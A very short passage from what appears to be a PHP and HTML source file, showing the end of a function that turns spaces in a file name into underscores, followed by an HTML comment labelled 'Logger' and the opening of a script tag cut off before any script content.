	return str_replace(" ","_",$file);
}

?>
<!--Logger-->

<script type="text/jav